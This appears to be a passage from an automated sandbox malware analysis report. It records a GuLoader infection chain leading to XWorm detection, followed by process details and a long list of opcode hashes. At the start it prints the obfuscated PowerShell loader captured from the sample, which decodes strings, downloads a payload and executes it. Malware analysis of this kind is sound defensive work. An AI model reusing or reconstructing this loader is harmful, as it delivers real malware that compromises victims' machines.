Pa,tWFragme Skrib BertCRitualHoggii aurseDis,enSublit');$Lngerevarig+=$Boglrdes[1];Smrkers ($Lngerevarig);Smrkers (hdrede 'bomol$SansaPF.rveySt,derAnsteaPeriknFejlno.lempiConcadBalle.TilbyH Lo ieCorroa SpildRampiebrisarudspesFremt[ utte$SnkelTBa,keuKynu.dS ramkHelleo SignpPerspp LacteBasbarB whon Re,oeDepetsOrigi]Ha,rs=.rese$TandgSMachetCladoiA.stekSkribpEkster Virko Barnp G ne ');$Emplanes=hdrede 'Super$PondsPMonocySkrddrSensua WaldnAltico Aggri B ofdUnd.r.Go wiDTv.faoTriplwSk.tenBas slDot.noUnrubaPhysidAn,roFSuperi.alacl oreaeTande(Offer$AttraL Stito Rep.dP.rnod.xhaleBajonnFjerndNonreeStrans Swea,Hyper$Gi,lyBThermrSofa a VelknBesprdAfgift pu.raUnatulMoraletorp.rBaga.nForvieTanke)Blsop ';$Brandtalerne=$Boglrdes[0];Smrkers (hdrede ' Nati$Namarg ,dkllG,ainoKontrbUndera.kidel.seud:cauldWModele unids EmbrlCoa,jeEnodayCivicij,llasOvnlamRewei9N.rma0Buffi=Overt( t afTMagtbeE,linsEf,ustIndsm-HushoPsamplaPhthatConvihAutoc Kinne$ContrBStenorNonseaBlkklnOxhordUngautCivila CoralrenteeGlimrrWal mnVeugleInsim)Cyc o ');while (!$Wesleyism90) {Smrkers (hdrede 'Legum$Mandag DivelFraadopro.abConsua Jagtl Torf:Tug eAUddykuSu ulmSlowfaSpy.kgMutuaaGl,tt=Sp.se$SolistFugtfr ndsiuSoviee pun ') ;Smrkers $Emplanes;Smrkers (hdrede 'neuroS,ugtutGoldsa.ylesrRaf,itErsta- Vat,SU,envlTr,moeNringeSakulpM chi Efflo4For,r ');Smrkers (hdrede 'Behag$ jemvg,rammlTrompo RulabGavlhahage,lSamsp:G.addW And egablesRotunl Paroe Ta,syCentriSerboscercimF.rbu9Aboli0 har=f rme( DiscTTo pleSagfrsDob,etFlerv-Rund.PSammeaSkylltYndigh Bn s svovl$Ttn nBSax fr,reinaDeo ynBajadd Benjt.rochaStubblPretreUnconr ,hennIre eeTintn)Infes ') ;Smrkers (hdrede 'Panno$huen,g Va,dl adreo Kr sbAmbosa StrilStryg:Tro aNEkstraRododb S raoStarti KoranAlabatSighteKursurOarl.vGunvoaRebapl Em,slMontreAnorct OmsvsU sty=Aaleg$Re.tigGuidolOrienoPolstbUndosaTi kllLejli:KorntPDeambrComp t SubheooblanMinictMiddliYunkesLagertOdyss+Da,ha+Hj.es% 
Wood$ZulhiS.nempoBarbemTserbmFelaheWel,er,ashhfGhaneu.ipargHerenlOpnaaeSalgsmFuldmoFettsdSvigteErgo.lTereslPerfue DiserGoorosNepa..Toccac Forno S mtuEkspon BagltTermo ') ;$Loddendes=$Sommerfuglemodellers[$Nabointervallets];}$Programpakke=340015;$Leath=26897;Smrkers (hdrede ',kris$HypergCoopelKnaldoUmorabGtersaKvintlF.ail:Sdes CNringoForb.nScir fIncurlSixmoa .isctBenedeHanga Destr= Indo ScrumGTe.hne AlqutTae i-LkkerC AnveoAeolon CholtC ocaeUltran.rstetPeace Raptu$varieBU prer AppeaByvaan LngddKn trtSkue.aGramml B.lteU.derrSpacin Bofoe Brak ');Smrkers (hdrede 'Raket$.oknigRebral TabeoCephab.oophaUdboml Bass:PraetAForrelDoku bGenreiTeamen SvovoAcc,lePox.nn Capa Acron=Overs Ge,ni[DokumS.nwaly steosDybdetForskeImponmSmede.R sciC HippoKorrentringvAfnazeimperrShohetRampo]Idiom:Super:L,phiFGill.r Sunso Tranm BidrB.leipaAtom,sUnpure Vika6 est4ElectS Pip.tTroldrM,croi WadmnP tgigPand.(Pter,$ TracC Ko.goSped.nPilhefSemiflRin,ea BrantJordve.aane)Dodec ');Smrkers (hdrede ' Unla$SpheggH ngal SpiloTylotbFor,aa FlytlD rth:Unna,AFordomUnsapp KenyuIdolit SoejeVar.ledogm sLokal .icqu=Deorb Trime[BarkaSbenv.yOverdsMonomtDissee ummmSagsk.UfrihT A.fdeS lidxArcadtjeapo.SalthEGl.ednSiv rcForgeoUmbosdBronciWate,n De.og,idym]Kunde:Dis,e:MoeriASangdSBurlaCReachI limI,ohor.DentiGUnmapeObliqtM.edsS EleptEndosrS.guaiDiakon Undegvitro(Unp,r$ProduAnonanl Drbeb ,horiE tern WankoInt,reUnsysnFo be)Etats ');Smrkers (hdrede 'Frank$NorthgNobl lUdlaao,agplbStudea serolTuber: BiofAFilipl KissvNonnaa Lo an Mikk= Nat $Sej tA asermOvercpMonjauEquiltSi hoeBastaeStnkesChapp.UnremsMicr uChirobC.rvisMa ultUdsgnrHeinriInconnIgl egVene.(Handw$BlitzPQuipsrHjemmo sa vgHab.trHalola RechmPelsdpInsalaUnc lkAbdickSuseneLowwo, Angr$ UninLTilvre E traneglitResishRedni)C.ssa ');Smrkers $Alvan;"
                                                                                    Imagebase:0x1e0000
                                                                                    File size:433'152 bytes
                                                                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000006.00000002.2615577920.0000000008440000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000006.00000002.2609130468.000000000573F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000006.00000002.2616022619.000000000A044000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:7
                                                                                    Start time:15:12:22
                                                                                    Start date:23/05/2024
                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Innumerable.Sno && echo t"
                                                                                    Imagebase:0x1c0000
                                                                                    File size:236'544 bytes
                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

Target ID: 12
Start time: 15:12:45
Start date: 23/05/2024
Path: C:\Program Files (x86)\Windows Mail\wab.exe
Wow64 process (32bit): true
Commandline: "C:\Program Files (x86)\windows mail\wab.exe"
Imagebase: 0x120000
File size: 516'608 bytes
MD5 hash: 251E51E2FEDCE8BB82763D39D631EF89
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000C.00000002.3376138960.0000000023191000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000C.00000002.3357542132.0000000005144000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation: moderate
Has exited: false

                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7160000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e6b9cf002c4c9da99f91fd19d201090710f76b8f7ac1a505b792d8aa7e4c2ea7
                                                                                      • Instruction ID: 9c220a7a7a524ca7cd526cd6f0dcc5d4f092b087ac9bc8216ab9acb7df27901e
                                                                                      • Opcode Fuzzy Hash: e6b9cf002c4c9da99f91fd19d201090710f76b8f7ac1a505b792d8aa7e4c2ea7
                                                                                      • Instruction Fuzzy Hash: 5FF18E74A00215DFEB24DB68C855F6ABBB3AFC5700F1480A9E509AF795CB71DC818FA1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2612357432.0000000007160000.00000040.00000800.00020000.00000000.sdmp, Offset: 07160000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7160000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 70591b4005bfeb961b9d41631f508589095986acd25d0376050f3092de9567a8
                                                                                      • Instruction ID: ad70cdcfcf48c803464fe32462a26ead5321201b4ccecf91c98f2a9c385dba80
                                                                                      • Opcode Fuzzy Hash: 70591b4005bfeb961b9d41631f508589095986acd25d0376050f3092de9567a8
                                                                                      • Instruction Fuzzy Hash: 40E193B4A002149FD724DB68C954BAEBBB3AFC5704F1084E9D509AF791CB72ED818F91
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2612357432.0000000007160000.00000040.00000800.00020000.00000000.sdmp, Offset: 07160000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7160000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 5b886071d7e4134d9a50060570d40828f5a6429b7de26af3a72d1eaa4bdc9d52
                                                                                      • Instruction ID: 57ee6b7c80879d4b0d47c79a1382ca002f831564c07fd04dfef4ff99ae385351
                                                                                      • Opcode Fuzzy Hash: 5b886071d7e4134d9a50060570d40828f5a6429b7de26af3a72d1eaa4bdc9d52
                                                                                      • Instruction Fuzzy Hash: 47D1AEB4A00209DBDB18DB68C458BAEBBB3AFC4714F20C029E5016F7D5CB75DC458BA2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2592375726.0000000004430000.00000040.00000800.00020000.00000000.sdmp, Offset: 04430000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_4430000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f07b1410fab7d8f924ad5899bbefa1f0b1975c502c4923013abc5f99ff63a4e8
                                                                                      • Instruction ID: df1aa8e67daef11c6f3cc2178c221538b1e4e2104acb1a6994f67a8d7dba6267
                                                                                      • Opcode Fuzzy Hash: f07b1410fab7d8f924ad5899bbefa1f0b1975c502c4923013abc5f99ff63a4e8
                                                                                      • Instruction Fuzzy Hash: 49D1E674A01249DFDB15CFA8D584A9EFBF2EF48714F25815AE804AB361C731ED82CB90
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2612357432.0000000007160000.00000040.00000800.00020000.00000000.sdmp, Offset: 07160000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7160000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 45afb1f5f258913ebaa47c061c3045b0aa5ffa79949275cc2ef9cccde58afa6d
                                                                                      • Instruction ID: 40a41cd625612a1f111d27cec4bddfd008d841c297dcaf449f60dea22d0eca60
                                                                                      • Opcode Fuzzy Hash: 45afb1f5f258913ebaa47c061c3045b0aa5ffa79949275cc2ef9cccde58afa6d
                                                                                      • Instruction Fuzzy Hash: DAD181B4A00215DFDB24DB58C854F9EBBB3AF85704F1081A9D509AF785CB71DD828FA2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2592375726.0000000004430000.00000040.00000800.00020000.00000000.sdmp, Offset: 04430000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_4430000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d933a81a794a81f1de230f0e70de57f9cad0d0ade3949d3b345277062824f07f
                                                                                      • Instruction ID: 5530ccce46b88b3bd4a3d9f253a9256072a92224dcd83c28a802dce8ec98fbfd
                                                                                      • Opcode Fuzzy Hash: d933a81a794a81f1de230f0e70de57f9cad0d0ade3949d3b345277062824f07f
                                                                                      • Instruction Fuzzy Hash: FFA18F31A00248DFDF14DFA4C884A9EBBF2FF89715F11455AE806AB355DB74AD49CB80
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2592375726.0000000004430000.00000040.00000800.00020000.00000000.sdmp, Offset: 04430000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_4430000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 01d7663e096fcc7ad2d79461b837a58b06e8537a6963ce119039ad8a0a65d2f2
                                                                                      • Instruction ID: 9bda2a75353fc9ba3fff127453f0956695c736a9cd237c742023641e489f2f7c
                                                                                      • Opcode Fuzzy Hash: 01d7663e096fcc7ad2d79461b837a58b06e8537a6963ce119039ad8a0a65d2f2
                                                                                      • Instruction Fuzzy Hash: 7EB15E70E00209DFDF10CFA9D9857DEBBF1AF48B15F14812AE814A7394EB74A849CB81
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2612357432.0000000007160000.00000040.00000800.00020000.00000000.sdmp, Offset: 07160000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7160000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 897d0393cdb7aa827ed8f7432688056d10a913e92cf29d948a5a09cf0723458e
                                                                                      • Instruction ID: 0c678ce22d865fcdd0efc2777d9e7d7eae0671cf72fba32313737464728ff2be
                                                                                      • Opcode Fuzzy Hash: 897d0393cdb7aa827ed8f7432688056d10a913e92cf29d948a5a09cf0723458e
                                                                                      • Instruction Fuzzy Hash: 36A1ADB4A002059FDB19CB58C448BAEBBB3AF84708F11C059E5016F7D5CB75EC85CBA1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2612357432.0000000007160000.00000040.00000800.00020000.00000000.sdmp, Offset: 07160000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7160000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: dde35ce886e966cc1e9cbfd2424fe5a4d8fadf85bb293afcd38f61f6b323b805
                                                                                      • Instruction ID: ea610ad695a458aba920f273286ec268dfd42dac4007845d33e10806e613c2aa
                                                                                      • Opcode Fuzzy Hash: dde35ce886e966cc1e9cbfd2424fe5a4d8fadf85bb293afcd38f61f6b323b805
                                                                                      • Instruction Fuzzy Hash: 84A1ACB4A002059FDB19CB58C548BAEBBB3AF88708F15C059E8116F7D5CB75EC85CBA1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2592375726.0000000004430000.00000040.00000800.00020000.00000000.sdmp, Offset: 04430000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_4430000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b15b033b67eea270e767e620aff0493e514b8d5db4f6808a02b2824bf2c78f66
                                                                                      • Instruction ID: f795b7022b1f634f787eb7b41b6241cc6ec9f97ae45bf605337287f65c169525
                                                                                      • Opcode Fuzzy Hash: b15b033b67eea270e767e620aff0493e514b8d5db4f6808a02b2824bf2c78f66
                                                                                      • Instruction Fuzzy Hash: B5918E34A01204DFCB15EF68D8449AEFBF2BF89711F1485AAE4459B761CB35EC86CB90
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2592375726.0000000004430000.00000040.00000800.00020000.00000000.sdmp, Offset: 04430000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_4430000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ac2619d338fd69ed66665e99b476972075baba7347f073af48e42e6939420773
                                                                                      • Instruction ID: 51a5cd8c5e57019f4f7127552f1633674a394128b50dd8b8d7b3e28f97297d89
                                                                                      • Opcode Fuzzy Hash: ac2619d338fd69ed66665e99b476972075baba7347f073af48e42e6939420773
                                                                                      • Instruction Fuzzy Hash: 0091BC74A00649CFCB05CF59C594AAEFBB1FF88310B2586AAD555AB3A5C335FC41CBA0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2612357432.0000000007160000.00000040.00000800.00020000.00000000.sdmp, Offset: 07160000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7160000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b1e775c8f0f8fb856a356a99c4b7d3c3db7295f06c9efaae15192a0974ef5770
                                                                                      • Instruction ID: 33bfd37ae5a870dfaa696446224043987c2a18a0c5cd03ec10713462c34d012c
                                                                                      • Opcode Fuzzy Hash: b1e775c8f0f8fb856a356a99c4b7d3c3db7295f06c9efaae15192a0974ef5770
                                                                                      • Instruction Fuzzy Hash: 12815CB8A00205DFDB15CF58C598AA9BBB2FF89314F15C169D804AB395CB32DC55CFA1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2612357432.0000000007160000.00000040.00000800.00020000.00000000.sdmp, Offset: 07160000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7160000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 30429c9350eb944fb423f04130a37ec0ae9a9c88eabe10293acf6fa7dd4c114e
                                                                                      • Instruction ID: f0f1b92764e8bdd2561d8e47f7292b168de724736b9a6337974097a0328235f9
                                                                                      • Opcode Fuzzy Hash: 30429c9350eb944fb423f04130a37ec0ae9a9c88eabe10293acf6fa7dd4c114e
                                                                                      • Instruction Fuzzy Hash: B1813BB8A00205DFDB15CB58C598AAAB7B2BF89314F15C169E804AB395CB32DC55CFA1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2592375726.0000000004430000.00000040.00000800.00020000.00000000.sdmp, Offset: 04430000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_4430000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 02258f89be7ffae4eaea28c15aafe291086a28c67fad3d86a487a501d6d56a3e
                                                                                      • Instruction ID: e52a19b8c5951e3b5e426705fc1e7a0b66bcfe2bab9e38f5137a8cb31a5e4d05
                                                                                      • Opcode Fuzzy Hash: 02258f89be7ffae4eaea28c15aafe291086a28c67fad3d86a487a501d6d56a3e
                                                                                      • Instruction Fuzzy Hash: 16719F71A00615CFDB14DF68C880A9EBBF2FF89315F14856AD4159B750DBB4AC46CF80
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2592375726.0000000004430000.00000040.00000800.00020000.00000000.sdmp, Offset: 04430000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_4430000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a6c0387e889717767a4ae6d1d1ef0bfd95be950e9b583f550bad46ab1247078c
                                                                                      • Instruction ID: e1efbe7fd96fb6136571b2878fe544fd1cb18b5c61e7279d98d5eebc61d63fac
                                                                                      • Opcode Fuzzy Hash: a6c0387e889717767a4ae6d1d1ef0bfd95be950e9b583f550bad46ab1247078c
                                                                                      • Instruction Fuzzy Hash: 0E713C70A00248DFDF18DFA4D484AAEBBF2FF88305F14846AD411AB790DB75AC85CB90
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2592375726.0000000004430000.00000040.00000800.00020000.00000000.sdmp, Offset: 04430000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_4430000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3f275895c3df0c9b85e9be877919c6db3ce9dcf8ddb28dd97cd5884292c289ad
                                                                                      • Instruction ID: c36a56ed28c2e224642dc5de5de1ca9f1c218c345750353e1e61ee6247c42eef
                                                                                      • Opcode Fuzzy Hash: 3f275895c3df0c9b85e9be877919c6db3ce9dcf8ddb28dd97cd5884292c289ad
                                                                                      • Instruction Fuzzy Hash: C1515DB1A00209DFDB18DFA5C8447AEBBF6FF89711F14842AD405AB750DBB4AC85CB50
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2612357432.0000000007160000.00000040.00000800.00020000.00000000.sdmp, Offset: 07160000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7160000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f1decbf64e4f060c845fa06daa4a817f51a3a7d9fc6999ad1dba3b61acda51c9
                                                                                      • Instruction ID: 3b68736ae8e521d0ebf0128423b1bc006c8571db8e80660e02c75897d89b98ef
                                                                                      • Opcode Fuzzy Hash: f1decbf64e4f060c845fa06daa4a817f51a3a7d9fc6999ad1dba3b61acda51c9
                                                                                      • Instruction Fuzzy Hash: 3D5126B1A093859FC7138B64C818A66BFB1AF86210F2DC1DBD5649F2D3C731D85AC791
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2592375726.0000000004430000.00000040.00000800.00020000.00000000.sdmp, Offset: 04430000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_4430000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 5e859eaa262dcba090c1369736080b9f7b41e5170c8ba0c7ad4f54c71bbf35cb
                                                                                      • Instruction ID: ca0f6fa06e7a23375e62ce3e803acf3fb3970d379c461d27da8f6c21428e3e52
                                                                                      • Opcode Fuzzy Hash: 5e859eaa262dcba090c1369736080b9f7b41e5170c8ba0c7ad4f54c71bbf35cb
                                                                                      • Instruction Fuzzy Hash: 69419D71A002008FDB18DF64C954AAE7BF6EF8D725F08506EE402EBBA0CB74AC45CB50
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2592375726.0000000004430000.00000040.00000800.00020000.00000000.sdmp, Offset: 04430000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_4430000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 887842fae6d02694aac84be53bed52478ecf4d3d17779cdeb7aba95bd68a4075
                                                                                      • Instruction ID: 037147b71c5b3abed32c3a238a82f670be9abecab96e51ec844fc02131ee18ec
                                                                                      • Opcode Fuzzy Hash: 887842fae6d02694aac84be53bed52478ecf4d3d17779cdeb7aba95bd68a4075
                                                                                      • Instruction Fuzzy Hash: 57411774A00609DFCB05CF59C598DAAFBB1FF88310B25869AD945AB3A4C771FC51CBA0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2612357432.0000000007160000.00000040.00000800.00020000.00000000.sdmp, Offset: 07160000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7160000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: fe4688f72d53ef7a84316875a9e694e3970288003358297e870570984c58916f
                                                                                      • Instruction ID: d3e6415b016cd249fc464af438827ae6114d35277d5879933ef7de1088dfad1f
                                                                                      • Opcode Fuzzy Hash: fe4688f72d53ef7a84316875a9e694e3970288003358297e870570984c58916f
                                                                                      • Instruction Fuzzy Hash: 61317CF5605306DFDF224A65840877A7B637F82640F0502BED810DB2C1E736C968C762
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2612357432.0000000007160000.00000040.00000800.00020000.00000000.sdmp, Offset: 07160000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7160000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 63512b690f7c3bc2c7f7bef3cf5d37d5558e76f0fc0f66e1faa2526daee7bce5
                                                                                      • Instruction ID: 3fe4a797555f9c4b7c5584a23531301564de31961d367d375bbec7dfd4eed452
                                                                                      • Opcode Fuzzy Hash: 63512b690f7c3bc2c7f7bef3cf5d37d5558e76f0fc0f66e1faa2526daee7bce5
                                                                                      • Instruction Fuzzy Hash: 59317574B00214ABE714ABA4C855FAF7AA3AFC5754F10C424E901AF7D1CFB6DC858BA1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2612357432.0000000007160000.00000040.00000800.00020000.00000000.sdmp, Offset: 07160000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7160000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2436e03f6309b2dd924e12c0ef9d780df1ba7ef7077d384c2282ab090c073d24
                                                                                      • Instruction ID: d634f33c98aa64122dae9a1df43538260c941389e33984ca461a0adf9ebd674b
                                                                                      • Opcode Fuzzy Hash: 2436e03f6309b2dd924e12c0ef9d780df1ba7ef7077d384c2282ab090c073d24
                                                                                      • Instruction Fuzzy Hash: F6310AF5A04306DFDB158E65C448F7A7BB6EF89741F15806AD80C872D1E735C8A0CBA1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2592375726.0000000004430000.00000040.00000800.00020000.00000000.sdmp, Offset: 04430000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_4430000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b60c89b19842bf06553aeb0c55b448369e6c1dca76ff12fb9c505fad830c6aa5
                                                                                      • Instruction ID: 36e1cccda425de0f0bd6ed9a4acd27d4fa58f3147cb320aabd5de33cec4f2317
                                                                                      • Opcode Fuzzy Hash: b60c89b19842bf06553aeb0c55b448369e6c1dca76ff12fb9c505fad830c6aa5
                                                                                      • Instruction Fuzzy Hash: A7211A74A042199FCB00CF98D4909AAFBB5FB89310B14859AD919EB352C735ED41CBA1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2612357432.0000000007160000.00000040.00000800.00020000.00000000.sdmp, Offset: 07160000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7160000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e16a13025fab62911dd3c4a008c1a2e4afbb3bd2334444a3e42f8fc4b151c570
                                                                                      • Instruction ID: fd4bdf65e735d24478d77db162ade2b15dbf4d2bc2903993ac7786ecdca7ebaa
                                                                                      • Opcode Fuzzy Hash: e16a13025fab62911dd3c4a008c1a2e4afbb3bd2334444a3e42f8fc4b151c570
                                                                                      • Instruction Fuzzy Hash: B3217FB064025A9BD7149B24C844BED7B72AB82314F1081A5D649AF781CBB6AD82CFE1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2592375726.0000000004430000.00000040.00000800.00020000.00000000.sdmp, Offset: 04430000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_4430000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f17f21f1157463ca71004e1b1fb67c6f56f0f7e403ee549e9cf9b698eef5d539
                                                                                      • Instruction ID: 163b6585a6d450e14734d642391f4e6b19150d839784964d9d53683bec5863e0
                                                                                      • Opcode Fuzzy Hash: f17f21f1157463ca71004e1b1fb67c6f56f0f7e403ee549e9cf9b698eef5d539
                                                                                      • Instruction Fuzzy Hash: 34214774A002099FCB01CF98D9809AEFBB5FF89310B14859AE919AB352C735FD41CBA1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2612357432.0000000007160000.00000040.00000800.00020000.00000000.sdmp, Offset: 07160000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7160000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c5371bedab2194a87efd9e3ef64649c7d78ec5363c5df0c30d0db0d9077e03d3
                                                                                      • Instruction ID: 3bf9ea43c37ea6f1a476ec8a89013dfaf1256ec8dc894568a601913b224c35ae
                                                                                      • Opcode Fuzzy Hash: c5371bedab2194a87efd9e3ef64649c7d78ec5363c5df0c30d0db0d9077e03d3
